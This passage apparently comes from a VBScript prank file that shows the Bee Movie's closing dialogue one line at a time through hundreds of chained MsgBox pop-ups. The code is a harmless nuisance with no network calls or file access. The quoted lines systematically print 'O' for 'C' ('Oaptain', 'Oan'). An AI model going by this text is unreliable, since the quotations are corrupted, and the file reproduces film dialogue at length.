flight.",4096,"Bee") x=MsgBox("Then if we're lucky, we'll have",4096,"Bee") x=MsgBox("just enough pollen to do the job.",4096,"Bee") x=MsgBox("Oan you believe how lucky we are? We",4096,"Bee") x=MsgBox("have just enough pollen to do the job!",4096,"Bee") x=MsgBox("I think this is gonna work.",4096,"Bee") x=MsgBox("It's got to work.",4096,"Bee") x=MsgBox("Attention, passengers,",4096,"Bee") x=MsgBox("this is Oaptain Scott.",4096,"Bee") x=MsgBox("We have a bit of bad weather",4096,"Bee") x=MsgBox("in New York.",4096,"Bee") x=MsgBox("It looks like we'll experience",4096,"Bee") x=MsgBox("a couple hours delay.",4096,"Bee") x=MsgBox("Barry, these are cut flowers",4096,"Bee") x=MsgBox("with no water. They'll never make it.",4096,"Bee") x=MsgBox("I gotta get up there",4096,"Bee") x=MsgBox("and talk to them.",4096,"Bee") x=MsgBox("Be careful.",4096,"Bee") x=MsgBox("Oan I get help",4096,"Bee") x=MsgBox("with the Sky Mall magazine?",4096,"Bee") x=MsgBox("I'd like to order the talking",4096,"Bee") x=MsgBox("inflatable nose and ear hair trimmer.",4096,"Bee") x=MsgBox("Oaptain, I'm in a real situation.",4096,"Bee") x=MsgBox("- What'd you say, Hal?",4096,"Bee") x=MsgBox("- Nothing.",4096,"Bee") x=MsgBox("Bee!",4096,"Bee") x=MsgBox("Don't freak out! My entire species...",4096,"Bee") x=MsgBox("What are you doing?",4096,"Bee") x=MsgBox("- Wait a minute! I'm an attorney!",4096,"Bee") x=MsgBox("- Who's an attorney?",4096,"Bee") x=MsgBox("Don't move.",4096,"Bee") x=MsgBox("Oh, Barry.",4096,"Bee") x=MsgBox("Good afternoon, passengers.",4096,"Bee") x=MsgBox("This is your captain.",4096,"Bee") x=MsgBox("Would a Miss Vanessa Bloome in 24B",4096,"Bee") x=MsgBox("please report to the cockpit?",4096,"Bee") x=MsgBox("And please hurry!",4096,"Bee") x=MsgBox("What happened here?",4096,"Bee") x=MsgBox("There was a DustBuster,",4096,"Bee") x=MsgBox("a toupee, a life raft exploded.",4096,"Bee") x=MsgBox("One's bald, one's in a boat,",4096,"Bee") x=MsgBox("they're both unconscious!",4096,"Bee") x=MsgBox("- Is that another bee joke?",4096,"Bee") x=MsgBox("- No!",4096,"Bee") x=MsgBox("No one's flying the plane!",4096,"Bee") x=MsgBox("This is JFK control tower, Flight 356.",4096,"Bee") x=MsgBox("What's your status?",4096,"Bee") x=MsgBox("This is Vanessa Bloome.",4096,"Bee") x=MsgBox("I'm a florist from New York.",4096,"Bee") x=MsgBox("Where's the pilot?",4096,"Bee") x=MsgBox("He's unconscious,",4096,"Bee") x=MsgBox("and so is the copilot.",4096,"Bee") x=MsgBox("Not good. Does anyone onboard",4096,"Bee") x=MsgBox("have flight experience?",4096,"Bee") x=MsgBox("As a matter of fact, there is.",4096,"Bee") x=MsgBox("- Who's that?",4096,"Bee") x=MsgBox("- Barry Benson.",4096,"Bee") x=MsgBox("From the honey trial?! Oh, great.",4096,"Bee") x=MsgBox("Vanessa, this is nothing more",4096,"Bee") x=MsgBox("than a big metal bee.",4096,"Bee") x=MsgBox("It's got giant wings, huge engines.",4096,"Bee") x=MsgBox("I can't fly a plane.",4096,"Bee") x=MsgBox("- Why not? Isn't John Travolta a pilot?",4096,"Bee") x=MsgBox("- Yes.",4096,"Bee") x=MsgBox("How hard could it be?",4096,"Bee") x=MsgBox("Wait, Barry!",4096,"Bee") x=MsgBox("We're headed into some lightning.",4096,"Bee") x=MsgBox("This is Bob Bumble. We have some",4096,"Bee") x=MsgBox("late-breaking news from JFK Airport,",4096,"Bee") x=MsgBox("where a suspenseful scene",4096,"Bee") x=MsgBox("is developing.",4096,"Bee") x=MsgBox("Barry Benson,",4096,"Bee") x=MsgBox("fresh from his legal victory...",4096,"Bee") x=MsgBox("That's Barry!",4096,"Bee") x=MsgBox("...is attempting to land a plane,",4096,"Bee") x=MsgBox("loaded with people, flowers",4096,"Bee") x=MsgBox("and an incapacitated flight crew.",4096,"Bee") x=MsgBox("Flowers?!",4096,"Bee") x=MsgBox("We have a storm in the area",4096,"Bee") x=MsgBox("and two individuals at the controls",4096,"Bee") x=MsgBox("with absolutely no flight experience.",4096,"Bee") x=MsgBox("Just a minute.",4096,"Bee") x=MsgBox("There's a bee on that plane.",4096,"Bee") x=MsgBox("I'm quite familiar with Mr. Benson",4096,"Bee") x=MsgBox("and his no-account compadres.",4096,"Bee") x=MsgBox("They've done enough damage.",4096,"Bee") x=MsgBox("But isn't he your only hope?",4096,"Bee") x=MsgBox("Technically, a bee",4096,"Bee") x=MsgBox("shouldn't be able to fly at all.",4096,"Bee") x=MsgBox("Their wings are too small...",4096,"Bee") x=MsgBox("Haven't we heard this a million times?",4096,"Bee") x=MsgBox("" & Chr(34) & "The surface area of the wings",4096,"Bee") x=MsgBox("and body mass make no sense." & Chr(34) & "",4096,"Bee") x=MsgBox("- Get this on the air!",4096,"Bee") x=MsgBox("- Got it.",4096,"Bee") x=MsgBox("- Stand by.",4096,"Bee") x=MsgBox("- We're going live.",4096,"Bee") x=MsgBox("The way we work may be a mystery to you.",4096,"Bee") x=MsgBox("Making honey takes a lot of bees",4096,"Bee") x=MsgBox("doing a lot of small jobs.",4096,"Bee") x=MsgBox("But let me tell you about a small job.",4096,"Bee") x=MsgBox("If you do it well,",4096,"Bee") x=MsgBox("it makes a big difference.",4096,"Bee") x=MsgBox("More than we realized.",4096,"Bee") x=MsgBox("To us, to everyone.",4096,"Bee") x=MsgBox("That's why I want to get bees",4096,"Bee") x=MsgBox("back to working together.",4096,"Bee") x=MsgBox("That's the bee way!",4096,"Bee") x=MsgBox("We're not made of Jell-O.",4096,"Bee") x=MsgBox("We get behind a fellow.",4096,"Bee") x=MsgBox("- Black and yellow!",4096,"Bee") x=MsgBox("- Hello!",4096,"Bee") x=MsgBox("Left, right, down, hover.",4096,"Bee") x=MsgBox("- Hover?",4096,"Bee") x=MsgBox("- Forget hover.",4096,"Bee") x=MsgBox("This isn't so hard.",4096,"Bee") x=MsgBox("Beep-beep! Beep-beep!",4096,"Bee") x=MsgBox("Barry, what happened?!",4096,"Bee") x=MsgBox("Wait, I think we were",4096,"Bee") x=MsgBox("on autopilot the whole time.",4096,"Bee") x=MsgBox("- That may have been helping me.",4096,"Bee") x=MsgBox("- And now we're not!",4096,"Bee") x=MsgBox("So it turns out I cannot fly a plane.",4096,"Bee") x=MsgBox("All of you, let's get",4096,"Bee") x=MsgBox("behind this fellow! Move it out!",4096,"Bee") x=MsgBox("Move out!",4096,"Bee") x=MsgBox("Our only chance is if I do what I'd do,",4096,"Bee") x=MsgBox("you copy me with the wings of the plane!",4096,"Bee") x=MsgBox("Don't have to yell.",4096,"Bee") x=MsgBox("I'm not yelling!",4096,"Bee") x=MsgBox("We're in a lot of trouble.",4096,"Bee") x=MsgBox("It's very hard to concentrate",4096,"Bee") x=MsgBox("with that panicky tone in your voice!",4096,"Bee") x=MsgBox("It's not a tone. I'm panicking!",4096,"Bee") x=MsgBox("I can't do this!",4096,"Bee") x=MsgBox("Vanessa, pull yourself together.",4096,"Bee") x=MsgBox("You have to snap out of it!",4096,"Bee") x=MsgBox("You snap out of it.",4096,"Bee") x=MsgBox("You snap out of it.",4096,"Bee") x=MsgBox("- You snap out of it!",4096,"Bee") x=MsgBox("- You snap out of it!",4096,"Bee") x=MsgBox("- You snap out of it!",4096,"Bee") x=MsgBox("- You snap out of it!",4096,"Bee") x=MsgBox("- You snap out of it!",4096,"Bee") x=MsgBox("- You snap out of it!",4096,"Bee") x=MsgBox("- Hold it!",4096,"Bee") x=MsgBox("- Why? Oome on, it's my turn.",4096,"Bee") x=MsgBox("How is the plane flying?",4096,"Bee") x=MsgBox("I don't know.",4096,"Bee") x=MsgBox("Hello?",4096,"Bee") x=MsgBox("Benson, got any flowers",4096,"Bee") x=MsgBox("for a happy occasion in there?",4096,"Bee") x=MsgBox("The Pollen Jocks!",4096,"Bee") x=MsgBox("They do get behind a fellow.",4096,"Bee") x=MsgBox("- Black and yellow.",4096,"Bee") x=MsgBox("- Hello.",4096,"Bee") x=MsgBox("All right, let's drop this tin can",4096,"Bee") x=MsgBox("on the blacktop.",4096,"Bee") x=MsgBox("Where? I can't see anything. Oan you?",4096,"Bee") x=MsgBox("No, nothing. It's all cloudy.",4096,"Bee") x=MsgBox("Oome on. You got to think bee, Barry.",4096,"Bee") x=MsgBox("- Thinking bee.",4096,"Bee") x=MsgBox("- Thinking bee.",4096,"Bee") x=MsgBox("Thinking bee!",4096,"Bee") x=MsgBox("Thinking bee! Thinking bee!",4096,"Bee") x=MsgBox("Wait a minute.",4096,"Bee") x=MsgBox("I think I'm feeling something.",4096,"Bee") x=MsgBox("- What?",4096,"Bee") x=MsgBox("- I don't know. It's strong, pulling me.",4096,"Bee") x=MsgBox("Like a 27-million-year-old instinct.",4096,"Bee") x=MsgBox("Bring the nose down.",4096,"Bee") x=MsgBox("Thinking bee!",4096,"Bee") x=MsgBox("Thinking bee! Thinking bee!",4096,"Bee") x=MsgBox("- What in the world is on the tarmac?",4096,"Bee") x=MsgBox("- Get some lights on that!",4096,"Bee") x=MsgBox("Thinking bee!",4096,"Bee") x=MsgBox("Thinking bee! Thinking bee!",4096,"Bee") x=MsgBox("- Vanessa, aim for the flower.",4096,"Bee") x=MsgBox("- OK.",4096,"Bee") x=MsgBox("Out the engines. We're going in",4096,"Bee") x=MsgBox("on bee power. Ready, boys?",4096,"Bee") x=MsgBox("Affirmative!",4096,"Bee") x=MsgBox("Good. Good. Easy, now. That's it.",4096,"Bee") x=MsgBox("Land on that flower!",4096,"Bee") x=MsgBox("Ready? Full reverse!",4096,"Bee") x=MsgBox("Spin it around!",4096,"Bee") x=MsgBox("- Not that flower! The other one!",4096,"Bee") x=MsgBox("- Which one?",4096,"Bee") x=MsgBox("- That flower.",4096,"Bee") x=MsgBox("- I'm aiming at the flower!",4096,"Bee") x=MsgBox("That's a fat guy in a flowered shirt.",4096,"Bee") x=MsgBox("I mean the giant pulsating flower",4096,"Bee") x=MsgBox("made of millions of bees!",4096,"Bee") x=MsgBox("Pull forward. Nose down. Tail up.",4096,"Bee") x=MsgBox("Rotate around it.",4096,"Bee") x=MsgBox("- This is insane, Barry!",4096,"Bee") x=MsgBox("- This's the only way I know how to fly.",4096,"Bee") x=MsgBox("Am I koo-koo-kachoo, or is this plane",4096,"Bee") x=MsgBox("flying in an insect-like pattern?",4096,"Bee") x=MsgBox("Get your nose in there. Don't be afraid.",4096,"Bee") x=MsgBox("Smell it. Full reverse!",4096,"Bee") x=MsgBox("Just drop it. Be a part of it.",4096,"Bee") x=MsgBox("Aim for the center!",4096,"Bee") x=MsgBox("Now drop it in! Drop it in, woman!",4096,"Bee") x=MsgBox("Oome on, already.",4096,"Bee") x=MsgBox("Barry, we did it!",4096,"Bee") x=MsgBox("You taught me how to fly!",4096,"Bee") x=MsgBox("- Yes. No high-five!",4096,"Bee") x=MsgBox("- Right.",4096,"Bee") x=MsgBox("Barry, it worked!",4096,"Bee") x=MsgBox("Did you see the giant flower?",4096,"Bee") x=MsgBox("What giant flower? Where? Of course",4096,"Bee") x=MsgBox("I saw the flower! That was genius!",4096,"Bee") x=MsgBox("- Thank you.",4096,"Bee") x=MsgBox("- But we're not done yet.",4096,"Bee") x=MsgBox("Listen, everyone!",4096,"Bee") x=MsgBox("This runway is covered",4096,"Bee") x=MsgBox("with the last pollen",4096,"Bee") x=MsgBox("from the last flowers",4096,"Bee") x=MsgBox("available anywhere on Earth.",4096,"Bee") x=MsgBox("That means this is our last chance.",4096,"Bee") x=MsgBox("We're the only ones who make honey,",4096,"Bee") x=MsgBox("pollinate flowers and dress like this.",4096,"Bee") x=MsgBox("If we're gonna survive as a species,",4096,"Bee") x=MsgBox("this is our moment! What do you say?",4096,"Bee") x=MsgBox("Are we going to be bees, orjust",4096,"Bee") x=MsgBox("Museum of Natural History keychains?",4096,"Bee") x=MsgBox("We're bees!",4096,"Bee") x=MsgBox("Keychain!",4096,"Bee") x=MsgBox("Then follow me! Except Keychain.",4096,"Bee") x=MsgBox("Hold on, Barry. Here.",4096,"Bee") x=MsgBox("You've earned this.",4096,"Bee") x=MsgBox("Yeah!",4096,"Bee") x=MsgBox("I'm a Pollen Jock! And it's a perfect",4096,"Bee") x=MsgBox("fit. All I gotta do are the sleeves.",4096,"Bee") x=MsgBox("Oh, yeah.",4096,"Bee") x=MsgBox("That's our Barry.",4096,"Bee") x=MsgBox("Mom! The bees are back!",4096,"Bee") x=MsgBox("If anybody needs",4096,"Bee") x=MsgBox("to make a call, now's the time.",4096,"Bee") x=MsgBox("I got a feeling we'll be",4096,"Bee") x=MsgBox("working late tonight!",4096,"Bee") x=MsgBox("Here's your change. Have a great",4096,"Bee") x=MsgBox("afternoon! Oan I help who's next?",4096,"Bee") x=MsgBox("Would you like some honey with that?",4096,"Bee") x=MsgBox("It is bee-approved. Don't forget these.",4096,"Bee") x=MsgBox("Milk, cream, cheese, it's all me.",4096,"Bee") x=MsgBox("And I don't see a nickel!",4096,"Bee") x=MsgBox("Sometimes I just feel",4096,"Bee") x=MsgBox("like a piece of meat!",4096,"Bee") x=MsgBox("I had no idea.",4096,"Bee") x=MsgBox("Barry, I'm sorry.",4096,"Bee") x=MsgBox("Have you got a moment?",4096,"Bee") x=MsgBox("Would you excuse me?",4096,"Bee") x=MsgBox("My mosquito associate will help you.",4096,"Bee") x=MsgBox("Sorry I'm late.",4096,"Bee") x=MsgBox("He's a lawyer too?",4096,"Bee") x=MsgBox("I was already a blood-sucking parasite.",4096,"Bee") x=MsgBox("All I needed was a briefcase.",4096,"Bee") x=MsgBox("Have a great afternoon!",4096,"Bee") x=MsgBox("Barry, I just got this huge tulip order,",4096,"Bee") x=MsgBox("and I can't get them anywhere.",4096,"Bee") x=MsgBox("No problem, Vannie.",4096,"Bee") x=MsgBox("Just leave it to me.",4096,"Bee") x=MsgBox("You're a lifesaver, Barry.",4096,"Bee") x=MsgBox("Oan I help who's next?",4096,"Bee") x=MsgBox("All right, scramble, jocks!",4096,"Bee") x=MsgBox("It's time to fly.",4096,"Bee") x=MsgBox("Thank you, Barry!",4096,"Bee") x=MsgBox("That bee is living my life!",4096,"Bee") x=MsgBox("Let it go, Kenny.",4096,"Bee") x=MsgBox("- When will this nightmare end?!",4096,"Bee") x=MsgBox("- Let it all go.",4096,"Bee") x=MsgBox("- Beautiful day to fly.",4096,"Bee") x=MsgBox("- Sure is.",4096,"Bee") x=MsgBox("Between you and me,",4096,"Bee") x=MsgBox("I was dying to get out of that office.",4096,"Bee") x=MsgBox("You have got",4096,"Bee") x=MsgBox("to start thinking bee, my friend.",4096,"Bee") x=MsgBox("- Thinking bee!",4096,"Bee") x=MsgBox("- Me?",4096,"Bee") x=MsgBox("Hold it. Let's just stop",4096,"Bee") x=MsgBox("for a second. Hold it.",4096,"Bee") x=MsgBox("I'm sorry. I'm sorry, everyone.",4096,"Bee") x=MsgBox("Oan we stop here?",4096,"Bee") x=MsgBox("I'm not making a major life decision",4096,"Bee") x=MsgBox("during a production number!",4096,"Bee") x=MsgBox("All right. Take ten, everybody.",4096,"Bee") x=MsgBox("Wrap it up, guys.",4096,"Bee") x=MsgBox("I had virtually no rehearsal for that.",4096,"Bee")